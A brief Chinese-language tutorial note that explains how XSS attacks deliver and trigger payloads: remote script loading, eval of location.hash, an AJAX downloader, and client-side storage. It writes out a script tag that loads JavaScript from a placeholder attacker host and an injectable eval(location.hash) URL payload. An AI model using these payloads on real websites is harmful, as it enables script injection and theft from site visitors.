xss中shellcode的调用
shellcode就是利用漏洞所执行的代码
在完整的xss攻击之中,会将shellcode存放在一定的地方,然后触发漏洞,引发shellcode.
1.远程调用执行js
可将js代码单独放在一个js文件中,然后通过http协议远程加载该脚本。
如<script scr=“http://xxx.xxx.xxx.xx/xx/xss.js”></script>
xss.js中内容可为任意js恶意代码
2.windows.location.hash
使用js中的windows.location.hash方式获取浏览器url地址栏的xss代码
其方法为会自动获取url中#后的内容
如构造?submit=submit&xsscode=<script>eval(location.hash.substr(1))</script>#alert(/xss/)
3.xss Downloader
xss下载器就是将xss代码写到网页中,然后通过AJAX技术,获取 网页中xss代码
4.备选存储技术
可以将shellcode存储在客户端的本地域中,比如Http Cookie ,Flash共享对象,UserDate,localStroge等